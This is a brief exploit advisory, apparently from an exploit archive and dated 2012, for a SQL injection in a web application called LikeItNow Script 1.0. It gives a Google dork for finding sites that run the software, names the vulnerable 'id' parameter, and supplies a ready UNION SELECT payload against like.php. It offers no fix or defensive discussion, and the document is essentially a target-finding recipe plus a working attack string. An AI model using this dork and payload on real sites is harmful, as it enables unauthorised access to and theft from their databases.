# Exploit Title: LikeItNow Script SQLi Vulnerability # Google Dork: intitle:"LikeItNow - What do you like?" # Date: 17.11.2012 # Exploit Author: xStarCode # Vendor Homepage: # Software Link: # Version: 1.0 # Tested on: Linux # Vulnerable Parameters: id # Exploit Details: ======== www.site.com/like.php?id=1+UNION+SELECT+1,version(),3-- www.site.com/like.php?id=[SQL Injection] ======== # # Author Mail: xstarcode@vpn.st # Author Website: www.xstarcode.wordpress.com